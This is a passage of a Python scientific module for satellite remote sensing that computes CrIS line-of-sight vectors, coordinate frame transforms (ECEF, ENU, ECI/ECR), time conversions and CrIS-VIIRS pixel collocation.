servoErrInTrk=None):\n\n forIET = np.asarray(forIET)\n\n nScan, nFor = forIET.shape \n nFov = 9\n \n losInSSMF, Mat_SBFtoSSMF = buildFovLosInSSMF() \n\n ## unit vector of RMF \n normalRMF = np.array([-1.0, 0, 1.0], dtype=np.float64)/sqrt(2.0)\n \n commandedCrTrk = np.asarray(para['actualCrosstrackAngle'], dtype=np.float64)\n commandedInTrk = np.asarray(para['actualIntrackAngle'], dtype=np.float64)\n \n commandedCrTrk = np.broadcast_to(commandedCrTrk, (nScan, nFor))\n commandedInTrk = np.broadcast_to(commandedInTrk, (nScan, nFor))\n \n if servoErrCrTrk is None and servoErrInTrk is None: \n commandedCrTrk = commandedCrTrk*1e-6\n commandedInTrk = commandedInTrk*1e-6\n else: \n commandedCrTrk = (commandedCrTrk + servoErrCrTrk)*1e-6\n commandedInTrk = (commandedInTrk + servoErrInTrk)*1e-6\n \n ## adding FOV elements \n commandedCrTrk = np.broadcast_to(commandedCrTrk, (nFov, nScan, nFor))\n commandedInTrk = np.broadcast_to(commandedInTrk, (nFov, nScan, nFor))\n \n commandedCrTrk = np.transpose(commandedCrTrk, (1, 2, 0))\n commandedInTrk = np.transpose(commandedInTrk, (1, 2, 0))\n \n \n commandedCrTrk = commandedCrTrk.reshape(nScan*nFor*nFov)\n commandedInTrk = commandedInTrk.reshape(nScan*nFor*nFov)\n \n ## Compute Normal of SSMF \n normalSSMF = matrix_vector_product(rotationMatrixX(commandedCrTrk), normalRMF)\n normalSSMF = matrix_vector_product(rotationMatrixY(commandedInTrk), normalSSMF)\n \n ## get FOV LOS in SSMF \n losInSSMF, Mat_SBFtoSSMF = buildFovLosInSSMF()\n \n losInSSMF = np.broadcast_to(losInSSMF, (nScan, nFor, nFov, 3))\n losInSSMF = losInSSMF.reshape((nScan*nFor*nFov, 3))\n \n \n dotProdAns = dot_product(losInSSMF, normalSSMF) \n dotProdAns = dotProdAns.reshape(-1, 1) * normalSSMF\n \n losInSBF = matrix_vector_product(Mat_SBFtoSSMF, losInSSMF - 2*dotProdAns) \n \n losInSBF = losInSBF.reshape(nScan, nFor, nFov, 3)\n \n return losInSBF\n\n \n##################################################################################### \ndef buildQuatMatrix(Qw, Qi, Qj, Qk): \n \"\"\"\n //-------------------------------------------------------------------\n // See the book edited by James R. Wertz, Library of Congress CIP Data:\n // Computer Science Corporation. Attitude Systems Operation.\n // Spacecraft Attitude Determination and Control.\n // (Astrophysics and space library ; v. 73)\n // 'Contract no. NAS 5-11999.'\n // TL3260.C65 1978 629.47'42 78-23657\n // ISBN 90-277-0959-9\n // ISBN 90-277-1204-2 (pbk.)\n // Published by D. Reidel Publishing Company. Copyright 1978.\n // Last reprinted 1997. 
Appendix E, particullarly Page 762, E-8.\n // See also: http://mathworld.wolfram.com/EulerAngles.html\n //\n // The spacecraft attitude quaternions provide the rotation from J2000 ECI\n // coordinates to spacecraft coordinates.\n \n \"\"\"\n \n qMat2eci = np.zeros((Qw.size, 3, 3))\n \n #If the sum of squares is 1, then the quaternion is already normalized.\n mag = sqrt(Qi*Qi + Qj*Qj + Qk*Qk + Qw*Qw);\n \n Qw /= mag;\n Qi /= mag;\n Qj /= mag;\n Qk /= mag;\n\n # first row of the matrix\n qMat2eci[:, 0, 0] = (Qi*Qi) - (Qj*Qj) - (Qk*Qk) + (Qw*Qw);\n qMat2eci[:, 0, 1] = 2.e0*( (Qi*Qj) + (Qk*Qw) );\n qMat2eci[:, 0, 2] = 2.e0*( (Qi*Qk) - (Qj*Qw) );\n\n # second row of the matrix\n qMat2eci[:, 1, 0] = 2.e0*( (Qi*Qj) - (Qk*Qw) );\n qMat2eci[:, 1, 1] = -(Qi*Qi) + (Qj*Qj) - (Qk*Qk) + (Qw*Qw);\n qMat2eci[:, 1, 2] = 2.e0*( (Qj*Qk) + (Qi*Qw) );\n\n # third row of the matrix\n qMat2eci[:, 2, 0] = 2.e0*( (Qi*Qk) + (Qj*Qw) );\n qMat2eci[:, 2, 1] = 2.e0*( (Qj*Qk) - (Qi*Qw) );\n qMat2eci[:, 2, 2] = -(Qi*Qi) - (Qj*Qj) + (Qk*Qk) + (Qw*Qw);\n\n ## Return the spacecraft coordinates from J2000 ECI to SC matrix.\n Mat_SCtoECI = qMat2eci.squeeze()\n return Mat_SCtoECI\n \n#####################################################################################\ndef LLA2ECEF(lonIn, latIn, altIn):\n \"\"\"\n Transform lon,lat,alt (WGS84 degrees, meters) to ECEF\n x,y,z (meters)\n \"\"\"\n lonRad = deg2rad(np.asarray(lonIn, dtype=np.float64) ) \n latRad = deg2rad(np.asarray(latIn, dtype=np.float64) )\n alt = np.asarray(altIn, dtype=np.float64) \n a, b, e2 = WGS84_A, WGS84_B, WGS84_E2\n\n ## N = Radius of Curvature (meters), defined as:\n N = a/sqrt(1.0-e2*(sin(latRad)**2.0))\n \n ##$ calcute X, Y, Z\n x=(N+alt)*cos(latRad)*cos(lonRad)\n y=(N+alt)*cos(latRad)*sin(lonRad)\n z=(b**2.0/a**2.0*N + altIn)*sin(latRad)\n\n return x, y, z \n\n\ndef RAE2ENU(azimuthIn, zenithIn, rangeIn):\n \"\"\"\n Transform azimuth, zenith, range to ENU x,y,z (meters)\n \"\"\"\n azimuth = deg2rad(np.asarray(azimuthIn, dtype=np.float64))\n zenith = deg2rad(np.asarray(zenithIn, dtype=np.float64))\n r = np.asarray(rangeIn, dtype=np.float64)\n\n # up \n up = r*cos(zenith)\n \n # projection on the x-y plane \n p = r*sin(zenith) \n \n # north \n north = p*cos(azimuth)\n \n # east\n east = p*sin(azimuth) \n\n return east, north, up\n\n \ndef ENU2RAE(east, north, up):\n \"\"\"\n Transform ENU x,y,z (meters) to azimuth angle, zenith angle, and range \n \"\"\"\n\n p = sqrt(east**2 + north**2 + up**2)\n \n zenith = rad2deg(arccos(up/p))\n azimuth = rad2deg(arctan2(east, north))\n \n return p, azimuth, zenith\n \n \n \n#####################################################################################\ndef ENU2ECEF (east, north, up, lon, dlat):\n \"\"\"\n Convert local East, North, Up (ENU) coordinates to the (x,y,z) Earth Centred Earth Fixed (ECEF) coordinates\n Reference is here: \n http://www.navipedia.net/index.php/Transformations_between_ECEF_and_ENU_coordinates\n Note that laitutde should be geocentric latitude instead of geodetic latitude \n Note: \n\n On June 16 2015\n This note from https://en.wikipedia.org/wiki/Geodetic_datum \n Note: \\ \\phi is the geodetic latitude. A prior version of this page showed use of the geocentric latitude (\\ \\phi^\\prime).\n The geocentric latitude is not the appropriate up direction for the local tangent plane. 
If the\n original geodetic latitude is available it should be used, otherwise, the relationship between geodetic and geocentric\n latitude has an altitude dependency, and is captured by ...\n \"\"\" \n\n x0 = np.asarray(east, dtype=np.float64)\n y0 = np.asarray(north, dtype=np.float64)\n z0 = np.asarray(up, dtype=np.float64)\n\n lm = deg2rad(np.asarray(lon, dtype=np.float64))\n ph = deg2rad(np.asarray(dlat, dtype=np.float64))\n\n x=-1.0*x0*sin(lm)-y0*cos(lm)*sin(ph)+z0*cos(lm)*cos(ph)\n y= x0*cos(lm) -y0*sin(lm)*sin(ph)+z0*sin(lm)*cos(ph)\n z= x0*0 +y0*cos(ph) +z0*sin(ph) \n\n return x, y, z\n\ndef ECEF2ENU (x, y, z, lon, dlat):\n \"\"\"\n From ECEF(x, y, z) to ENU (East, North, up) coordinates at a given location(lon, dlat)\n Reference is here: \n http://www.navipedia.net/index.php/Transformations_between_ECEF_and_ENU_coordinates\n Note that laitutde should be geocentric latitude instead of geodetic latitude\n \"\"\"\n \n x = np.asarray(x, dtype=np.float64)\n y = np.asarray(y, dtype=np.float64)\n z = np.asarray(z, dtype=np.float64)\n \n lm = deg2rad(np.asarray(lon, dtype=np.float64))\n ph = deg2rad(np.asarray(dlat, dtype=np.float64))\n \n east = -x*sin(lm) + y*cos(lm) \n north = -x*cos(lm)*sin(ph) - y*sin(lm)*sin(ph) + z*cos(ph) \n up = x*cos(lm)*cos(ph) + y*sin(lm)*cos(ph) + z*sin(ph)\n\n return east, north, up \n\ndef GEO2ECEF( lon, lat, satAzimuth, satRange, satZenith, height = None): \n \"\"\"\n from geolocation fields including lon, lat, satAzimuth, satRange, satZenith to compute \n LOS and satPos vectors in ECEF \n \"\"\" \n \n \n lon = np.asarray(lon, dtype=np.float64)\n lat = np.asarray(lat, dtype=np.float64)\n if height is None: height = np.zeros_like(lat)\n satAzimuth = np.asarray(satAzimuth, dtype=np.float64) \n satRange = np.asarray(satRange, dtype=np.float64) \n satZenith = np.asarray(satZenith , dtype=np.float64) \n \n savShape = lon.shape\n \n # compute CrIS Pos Vector \n pos_x, pos_y, pos_z = LLA2ECEF(lon, lat, height)\n pos_x = np.expand_dims(pos_x, axis=-1)\n pos_y = np.expand_dims(pos_y, axis=-1)\n pos_z = np.expand_dims(pos_z, axis=-1)\n\n # compute CrIS LOS Vector\n east, north, up = RAE2ENU(satAzimuth, satZenith, satRange)\n los_x, los_y, los_z = ENU2ECEF(east, north, up, lon, lat)\n los_x = np.expand_dims(los_x, axis=-1)\n los_y = np.expand_dims(los_y, axis=-1)\n los_z = np.expand_dims(los_z, axis=-1)\n \n pos = np.concatenate((pos_x, pos_y, pos_z), axis=-1)\n los = np.concatenate((los_x, los_y, los_z), axis=-1)\n \n satPos = pos + los \n \n return pos, los, satPos \n \n#####################################################################################\ndef ECEF2LLA(xIn, yIn, zIn):\n\n \"\"\"\n Transform ECEF x,y,z (meters) lon,lat,alt (WGS84 degrees, meters) to \n \"\"\"\n\n x = np.asarray(xIn, dtype=np.float64)\n y = np.asarray(yIn, dtype=np.float64)\n z = np.asarray(zIn, dtype=np.float64)\n\n if x.size != y.size or x.size != z.size or x.ndim > 1: \n print(x, y, z)\n print(x.shape, y.shape, z.shape)\n \n print (\"check input x, y, z's shape\")\n return\n\n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n geoLon, geoLat, geoAlt = pyproj.transform(ecef, lla, x, y, z, radians=False)\n\n return geoLon, geoLat, geoAlt\n \n \n\n##################################################################################### \ndef IET2ATIME(iet):\n \"\"\"\n convert IET time into TIME \n \"\"\"\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(iet*1e-6, format='sec')\n return aTime\n\n\ndef 
TIME2IET(datetime): \n \"\"\"\n convert a DATETIME varible into IET \n \"\"\"\n t1= Time(datetime, scale='utc')\n t0 = Time('1958-01-01', scale='tai')\n dt = t1.tai-t0.tai\n dt.format = 'sec'\n iet = np.int64(dt.value*1e6)\n return iet\n\ndef ATIME2IET(aTime): \n \"\"\"\n convert a TIME varible into IET \n \"\"\"\n t0 = Time('1958-01-01', scale='tai')\n dt = aTime.tai-t0.tai\n dt.format = 'sec'\n iet = np.int64(dt.value*1e6)\n return iet \n \n\n##################################################################################### \n \ndef ECR2ECI_NOVAS (inTime, inPos, inVel, tflag='IET'):\n\n \"\"\"\n Transform Position and Velocity vector from ECR to ECI frame using NOVAS function. \n \"\"\"\n inPos = np.asarray(inPos, dtype=np.float64)\n inVel = np.asarray(inVel, dtype=np.float64)\n \n \n oneFlag = 0 \n if inTime.size == 1: \n inTime = np.repeat(inTime, 2)\n oneFlag = 1\n if inPos.size ==3 : \n inPos = np.broadcast_to(inPos, (2, 3))\n if inVel.size == 3: \n inVel = np.broadcast_to(inVel, (2, 3))\n \n \n if tflag == 'IET': \n inTime = np.asarray(inTime)\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n if tflag == 'aTime': aTime = inTime\n \n # set Polar Motion data \n pmx, pmy = dat.pm_xy(aTime)\n pmx=pmx.value\n pmy=pmy.value\n \n # set TT-UT1 data\n delta_t = map(timedelta.total_seconds, aTime.tt.datetime-aTime.ut1.datetime)\n \n # set jd_ut1 data \n jd_ut1_high=aTime.ut1.jd\n jd_ut1_low = np.zeros_like(jd_ut1_high)\n \n inPos_List = inPos.tolist()\n \n mapfunc = partial(ter2cel, method=1) # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, inPos_List)\n outPos = np.asarray(s)\n \n if inVel.size ==1 : \n outVel = 0\n else: \n \n # counting Earth Rotation velocity\n tempVec = np.cross(np.array([0,0, ANGVEL]), inPos, axisa=0, axisb=1)\n vectorIn = inVel + tempVec\n \n vectorIn_List = vectorIn.tolist() \n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, vectorIn_List)\n outVel = np.asarray(s)\n \n if oneFlag == 1: \n outPos = outPos[0, :]\n if isinstance(outVel, np.ndarray): outVel = outVel[0, :]\n \n return outPos, outVel\n\ndef ECI2ECR_NOVAS (inTime, inPos, inVel, tflag='IET'):\n\n \"\"\"\n Transform Position and Velocity vector from ECI to ECR frame using NOVAS function. 
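\n\n A sketch of the expected call pattern (hypothetical inputs; the inverse of\n ECR2ECI_NOVAS above):\n\n >>> outPos, outVel = ECI2ECR_NOVAS(iet, posECI, velECI, tflag='IET')\n\n inPos and inVel accept a single 3-vector or an (N, 3) array; passing inVel=0\n skips the velocity transform and returns 0 for the velocity.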
\n \"\"\"\n \n inPos = np.asarray(inPos, dtype=np.float64)\n inVel = np.asarray(inVel, dtype=np.float64)\n \n \n oneFlag = 0 \n if inTime.size == 1: \n inTime = np.repeat(inTime, 2)\n oneFlag = 1\n if inPos.size ==3 : \n inPos = np.broadcast_to(inPos, (2, 3))\n if inVel.size == 3: \n inVel = np.broadcast_to(inVel, (2, 3))\n \n\n if tflag == 'IET': \n inTime = np.asarray(inTime)\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n if tflag == 'aTime': aTime = inTime\n \n # set Polar Motion data \n pmx, pmy = dat.pm_xy(aTime)\n pmx=pmx.value\n pmy=pmy.value\n \n # set TT-UT1 data\n delta_t = map(timedelta.total_seconds, aTime.tt.datetime-aTime.ut1.datetime)\n \n # set jd_ut1 data \n jd_ut1_high=aTime.ut1.jd\n jd_ut1_low = np.zeros_like(jd_ut1_high) \n inPos_List = inPos.tolist()\n\n mapfunc = partial(cel2ter, method=1) # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, inPos_List)\n \n outPos = np.asarray(s)\n \n if inVel.size == 1 : \n vectorOut = 0\n else: \n vectorIn_List = inVel.tolist()\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, vectorIn_List)\n vectorOut = np.asarray(s)\n \n # counting Earth Rotation velocity\n tempVec = np.cross(np.array([0,0, ANGVEL]), inPos, axisa=0, axisb=1)\n vectorOut = vectorOut - tempVec\n \n if oneFlag == 1: \n outPos = outPos[0, :]\n if isinstance(vectorOut, np.ndarray): vectorOut = vectorOut[0, :]\n \n return outPos, vectorOut\n\n \n##################################################################################### \ndef buildECIOrbFrame (inTime, posECR, velECR, tflag='IET'): \n\n \"\"\"\n NOTE: The \"orbit frame\" is a coordinate system describing the perfect\n attitude. If the spacecraft frame(coordinate system) is exactly aligned\n with the orbit frame, then the roll, pitch, and yaw would all be zero and\n spacecraft attitude would be perfect. The orbit frame Z axis points down\n to geodetic nadir, the Y axis is at a right angle to the Z axis, and the\n spacecraft velocity vector (which means the Y axis is nearly at a right\n angle to the orbit plane). The X axis completes a right handed cartesian\n coordinate system, and is less than one degree away from the direction of\n the spacecraft velocity vector. 
The X and Y axis of the orbit frame\n form a plane which is geodetically horizontal.\n \"\"\"\n\n posECR = np.asarray(posECR, dtype=np.float64)\n velECR = np.asarray(velECR, dtype=np.float64)\n inTime = np.asarray(inTime)\n \n if posECR.ndim ==1: posECR = np.expand_dims(posECR, axis=0)\n if velECR.ndim ==1: velECR = np.expand_dims(velECR, axis=0)\n if inTime.size == 1 and inTime.ndim == 0: inTime = np.expand_dims(inTime, axis=0)\n \n \n if tflag == 'IET': aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n \n # compute satellite lon, geodetic lat, and altitude \n sc_Lon, sc_dLat, sc_Alt = ECEF2LLA(posECR[:, 0], posECR[:, 1], posECR[:, 2])\n \n # compute gedetic nadir position vector in ECR \n nadir_p = np.zeros_like(posECR)\n nadir_p[:, 0], nadir_p[:, 1], nadir_p[:, 2] =LLA2ECEF(sc_Lon, sc_dLat, np.zeros_like(sc_Lon))\n \n # the vector from satellite to geodetic nadir \n nadirVecECR = nadir_p - posECR \n nadirVecECR = normalize_vector(nadirVecECR)\n \n # convert all the vector from ECR to ECI\n \n posECI, velECI = ECR2ECI_NOVAS(inTime, posECR, velECR)\n \n nadirVecECI, tmpVel = ECR2ECI_NOVAS(inTime, nadirVecECR, 0)\n \n orbFrameZ = nadirVecECI \n orbFrameY = np.cross(orbFrameZ, velECI)\n orbFrameY = normalize_vector(orbFrameY)\n orbFrameX = np.cross(orbFrameY, orbFrameZ)\n \n orbFrameY = normalize_vector(orbFrameY)\n orbFrameX = normalize_vector(orbFrameX)\n \n Mat_ECItoOrb = np.zeros((int(posECR.size/3), 3, 3), dtype=np.float64)\n \n Mat_ECItoOrb[:,:, 0] = orbFrameX\n Mat_ECItoOrb[:,:, 1] = orbFrameY\n Mat_ECItoOrb[:,:, 2] = orbFrameZ\n \n # return Rotation Matrix from Orbital Frame to ECI(J2000). \n return np.squeeze(Mat_ECItoOrb) \n##################################################################################### \n \ndef orb2sc(rollIn, pitchIn, yawIn): \n \"\"\"\n Now form the direction cosine matrix from the roll, pitch, and yaw.\n This is a 3-1-2 matrix (i.e.: yaw, then roll, then pitch). This\n forms a matrix which will rotate a vector in Orbit Frame Coordinates\n to spacecraft coordinates.\n \n input roll,pitch, yaw in radium\n \"\"\" \n roll = np.asarray(rollIn, dtype=np.float64)\n pitch = np.asarray(pitchIn, dtype=np.float64)\n yaw = np.asarray(yawIn, dtype=np.float64)\n \n if np.asarray(roll).shape != np.asarray(pitch).shape or \\\n np.asarray(roll).shape != np.asarray(yaw).shape: \n return None\n\n matDC = np.zeros((np.asarray(roll).size, 3, 3), dtype=np.float64)\n\n sin_roll = sin(roll)\n cos_roll = cos(roll)\n\n sin_pitch = sin(pitch)\n cos_pitch = cos(pitch)\n\n sin_yaw = sin(yaw)\n cos_yaw = cos(yaw)\n\n # Noted that it is from orbit to spacecraft\n \n # First row of the matrix.\n matDC[:, 0, 0] = (cos_yaw * cos_pitch) - (sin_yaw * sin_roll * sin_pitch)\n matDC[:, 0, 1] = (sin_yaw * cos_pitch) + (cos_yaw * sin_roll * sin_pitch)\n matDC[:, 0, 2] = -cos_roll * sin_pitch\n\n # Second row of matrix\n matDC[:, 1, 0] = -sin_yaw * cos_roll\n matDC[:, 1, 1] = cos_yaw * cos_roll\n matDC[:, 1, 2] = sin_roll\n\n #Third row of matrix.\n matDC[:, 2, 0] = (cos_yaw * sin_pitch) + (sin_yaw * sin_roll * cos_pitch)\n matDC[:, 2, 1] = (sin_yaw * sin_pitch) - (cos_yaw * sin_roll * cos_pitch)\n matDC[:, 2, 2] = cos_roll * cos_pitch\n \n Mat_SPCtoOrb = np.squeeze(matDC)\n \n # return Rotation Matrix from Orbital Frame to Spacecraft. \n return Mat_SPCtoOrb \n \n##################################################################################### \n \ndef calcGDRollPitchYaw(matDC): \n\n \n ## MatDC is Rotation Matrix from Orbital Frame to Spacecraft. 
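\n ## A hedged round-trip check (hypothetical small angles, in radians): orb2sc()\n ## above builds the 3-1-2 matrix, so this routine should recover its inputs:\n ##   r, p, y = calcGDRollPitchYaw(orb2sc(0.001, -0.002, 0.0005))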
\n if matDC.ndim ==2 and matDC.size==9: matDC = np.expand_dims(matDC, axis=0) \n\n roll = asin(matDC[:, 1, 2]);\n\n cos_roll = cos(roll);\n\n sin_pitch = (-matDC[:, 0, 2]) / cos_roll;\n cos_pitch = matDC[:, 2, 2] / cos_roll;\n\n pitch = atan2(sin_pitch, cos_pitch);\n\n sin_yaw = (-matDC[:, 1, 0]) / cos_roll;\n cos_yaw = matDC[:, 1, 1] / cos_roll;\n\n yaw = atan2(sin_yaw, cos_yaw);\n \n if matDC.size==9: return roll[0], pitch[0], yaw[0]\n else: return roll, pitch, yaw \n \n#####################################################################################\ndef conVec2LatLonAlt (Vec): \n\n inVec = np.asarray(Vec, dtype=np.float64)\n\n ### WGS84 Parameters\n a = WGS84_A\n f = WGS84_F \n b = WGS84_B\n e2= WGS84_E2\n ep = sqrt((a**2.0-b**2.0)/b**2.0)\n\n MAX_LAT_DIFF = 1.0e-10\n\n ## Calculate square of radius from the Earth axis to the position.\n ## Get radius to position by adding the Z squared.\n\n ## Distance from axis to position.\n xyRadius = (inVec[0]*inVec[0]) + (inVec[1]*inVec[1])\n\n ## Radius to position.\n posRadius = sqrt(xyRadius + (inVec[2]*inVec[2])) \n\n xyRadius = sqrt(xyRadius)\n\n ## Calculate the longitude.\n lon = arctan2(inVec[1], inVec[0]);\n\n ## Calculate the geocentric latitude.\n cLat = arcsin( inVec[2] / posRadius )\n \n dLat = cLat\n while True: \n \n tmpGDLat = dLat\n sinGDLat = sin(tmpGDLat)\n\n convNum = 1.0 / sqrt(1.0 - e2 * sinGDLat * sinGDLat)\n\n adjZ = inVec[2] + (a * convNum * e2 * sinGDLat)\n dLat = arctan2(adjZ, xyRadius)\n \n if np.abs(dLat - tmpGDLat) < MAX_LAT_DIFF: break\n\n RN = a/sqrt(1-e2*(sin(dLat)**2)) \n alt = xyRadius/cos(dLat) - RN \n \n return rad2deg(lon), rad2deg(dLat), alt \n#####################################################################################\n\ndef earth_radius_D (dLat): \n \"\"\"\n DESCRIPTION: Computes the radius of the earth, in meters, from the\n geodetic latitude.\n \"\"\"\n \n rlat = deg2rad(dLat) \n \n #***************************************************************************\n #convert input geodetic latitude to geocentric\n #save the sine of the geocentric latitude\n #**********************/\n\n clat = arctan( detic2centric * tan(rlat) );\n sine_lat = sin(clat)\n\n #/***************************************************************************\n #calculate the radius of earth, WGS 84 ellipsoid\n #**********************/\n radius = eq_radm / sqrt(1.e0 + (delta * sine_lat * sine_lat));\n\n return radius\n \n##################################################################################### \ndef match_cris_viirs(crisLos, crisPos, viirsPos, viirsMask):\n \"\"\"\n Match crisLos with viirsPos using the method by Wang et al. (2016)\n Wang, L., D. A. Tremblay, B. Zhang, and Y. Han, 2016: Fast and Accurate \n Collocation of the Visible Infrared Imaging Radiometer Suite \n Measurements and Cross-track Infrared Sounder Measurements. \n Remote Sensing, 8, 76; doi:10.3390/rs8010076. 
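\n\n A sketch of the expected call (hypothetical array shapes; vectors in ECEF meters):\n\n >>> idy, idx = match_cris_viirs(crisLos, crisPos, viirsPos, viirsMask)\n\n crisLos and crisPos are (..., 3) CrIS line-of-sight and ground-position vectors,\n viirsPos is (nLine, nPixel, 3), and viirsMask holds the VIIRS SDR QA flags\n (0 = good); idy/idx give the matched VIIRS pixel indices for each CrIS FOV.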
\n \"\"\"\n \n # Derive Satellite Postion \n crisSat = crisPos - crisLos \n \n # using KD-tree to find best matched points \n # build kdtree to find match index \n pytree_los = KDTree(viirsPos.reshape(-1, 3))\n dist_los, idx_los = pytree_los.query(crisPos.reshape(-1, 3) , sqr_dists=False)\n \n my, mx = np.unravel_index(idx_los, viirsPos.shape[0:2])\n \n idy, idx = find_match_index(crisLos.reshape(-1, 3),crisSat.reshape(-1, 3), viirsPos, viirsMask, mx, my)\n \n if np.array(idy).size ==0: \n idy = None \n idx = None\n else: \n idy = np.array(idy).reshape(crisLos.shape[0:crisLos.ndim-1])\n idx = np.array(idx).reshape(crisLos.shape[0:crisLos.ndim-1])\n\n return idy, idx\n\ndef match_cris_viirs_pert(crisLos, crisPos, viirsPos, viirsMask, crisLosPert):\n \"\"\"\n Match crisLos with viirsPos using the method by Wang et al. (2016)\n Wang, L., D. A. Tremblay, B. Zhang, and Y. Han, 2016: Fast and Accurate \n Collocation of the Visible Infrared Imaging Radiometer Suite \n Measurements and Cross-track Infrared Sounder Measurements. \n Remote Sensing, 8, 76; doi:10.3390/rs8010076. \n \"\"\"\n \n bsize, asize, nScan, nFor, nFov, nVec = crisLosPert.shape\n \n # Derive Satellite Postion \n crisSat = crisPos - crisLos \n crisSatPert = np.broadcast_to(crisSat, (bsize, asize, nScan, nFor, nFov, nVec))\n crisPosPert = compute_geolocation(crisSatPert.reshape(-1, 3), crisLosPert.reshape(-1,3), flag=1)\n \n \n # using KD-tree to find best matched points \n # build kdtree to find match index\n start_time = time.time() \n pytree_los = KDTree(viirsPos.reshape(-1, 3))\n dist_los, idx_los = pytree_los.query(crisPosPert.reshape(-1, 3) , sqr_dists=False)\n \n my, mx = np.unravel_index(idx_los, viirsPos.shape[0:2])\n my = my.reshape(bsize, asize, -1)\n mx = mx.reshape(bsize, asize, -1)\n \n print(\"K-D Tree <---> %s seconds ---\" % (time.time() - start_time))\n \n \n s = [find_match_index(crisLosPert[i, j].reshape(-1, 3),crisSatPert[i, j].reshape(-1, 3), viirsPos, viirsMask, mx[i, j], my[i, j]) \\\n for i, j in np.ndindex(crisLosPert.shape[0:2])]\n \n s = np.array(s) \n if s.size == 0: \n iidy = None \n iidx = None \n else: \n iidy = s[:, 0, :].reshape(crisLosPert.shape[0:crisLosPert.ndim-1])\n iidx = s[:, 1, :].reshape(crisLosPert.shape[0:crisLosPert.ndim-1]) \n \n return iidy, iidx \n \ndef angle (v_pos, v_Qa, c_sat, c_los, x0, y0, cos_half_fov): \n v_los = v_pos - c_sat\n cos_angle = dot_product(v_los, c_los)/mag_vector(v_los) - cos_half_fov\n iy, ix = np.where ( (v_Qa == 0) & (cos_angle > 0) )\n return np.asarray(iy)+y0, np.asarray(ix)+x0 \n \n\ndef find_match_index (cris_los, cris_sat, viirs_pos_in, viirs_sdrQa_in, \\\n mx, my, fovDia=0.963): \n \n nLine, nPixel = viirs_pos_in.shape[0:2]\n \n # setup parameters \n cos_half_fov=cos(deg2rad(fovDia/2.0)) \n if nPixel == 3200: nc = np.round(deg2rad(fovDia/2)*833.0/0.75*4).astype(np.int)\n if nPixel == 6400: nc = np.round(deg2rad(fovDia/2)*833.0/0.375*4).astype(np.int)\n \n # return list \n xb = mx-nc\n xb = xb.clip(0, nPixel-1)\n xe = mx+nc\n xe = xe.clip(0, nPixel-1)\n \n yb = my-nc\n yb = yb.clip(0, nLine-1)\n ye = my+nc\n ye = ye.clip(0, nLine-1)\n \n cris_los = normalize_vector(cris_los)\n \n viirs_pos_list = [viirs_pos_in[y0:y1, x0:x1] for y0, y1, x0, x1 in izip(yb, ye, xb, xe)]\n viirs_Qa_list = [viirs_sdrQa_in[y0:y1, x0:x1] for y0, y1, x0, x1 in izip(yb, ye, xb, xe)] \n \n \n # start_time = time.time()\n # viirs_los_list = [viirs_pos_in[yb[i]:ye[i], xb[i]:xe[i]] - cris_sat[i] for i in range(0, len(xb))]\n # cos_angle_list = [dot_product(v_los, 
cris_los[i])/mag_vector(v_los) - cos_half_fov for i, v_los in enumerate(viirs_los_list)]\n # iiy, iix = zip(*[np.where((v_Qa == 0) & (cos_angle > 0)) for cos_angle, v_Qa in zip(cos_angle_list, viirs_Qa_list)])\n # iix = [ix + x0 for ix, x0 in zip(iix, xb)]\n # iiy = [iy + y0 for iy, y0 in zip(iiy, yb)]\n # print(\"Method --- %s seconds ---\" % (time.time() - start_time))\n \n #start_time = time.time() \n anglefunc = partial(angle, cos_half_fov=cos_half_fov)\n \n res = map(anglefunc, viirs_pos_list, viirs_Qa_list, cris_sat.tolist(), cris_los.tolist(), xb.tolist(), yb.tolist())\n index_y, index_x = zip(*res)\n #print(\"angle <---> %s seconds ---\" % (time.time() - start_time))\n \n return index_y, index_x\n\n ##################################################################################### \n\n \ndef compute_geolocation (satellitePosition, lineOfSight, flag=None):\n \"\"\"\n geoLat, geoLon = compute_geolocation(satellitePosition, lineOfSight)\n\n Given the satellite position and the line-of-sight (or lookup vector), this function returns\n the geodetic (or geographic) latitude and longitude of the geolocation point on the Earth\n ellipsoid characterized by the Earth radius and flattening factor. \n \n Input:\n SatellitePosition: Three elements vector of the satellite position in the Earth Centered\n Reference (ECR) frame (float or double)\n lineOfSight: Three elements unit vector of lookup vector ( viewing vector toward the Earth surface).\n Output:\n geoLat : Geodetic (geographic) latitude of the Earth geolocation point. \n geoLon : Longitude of the Earth geolocation point. \n \"\"\"\n\n satellitePosition = np.asarray(satellitePosition, dtype=np.float64) \n lineOfSight = np.asarray(lineOfSight, dtype=np.float64) \n \n earthRadius = WGS84_A\n flatFact = WGS84_F\n \n if satellitePosition.ndim == 1: \n satellitePosition = np.expand_dims(satellitePosition, axis=0)\n \n if lineOfSight.ndim == 1: \n lineOfSight = np.expand_dims(lineOfSight, axis=0)\n \n if satellitePosition.shape != lineOfSight.shape or \\\n satellitePosition.ndim !=2 or \\\n lineOfSight.ndim !=2 : \n print ('check input array ... 
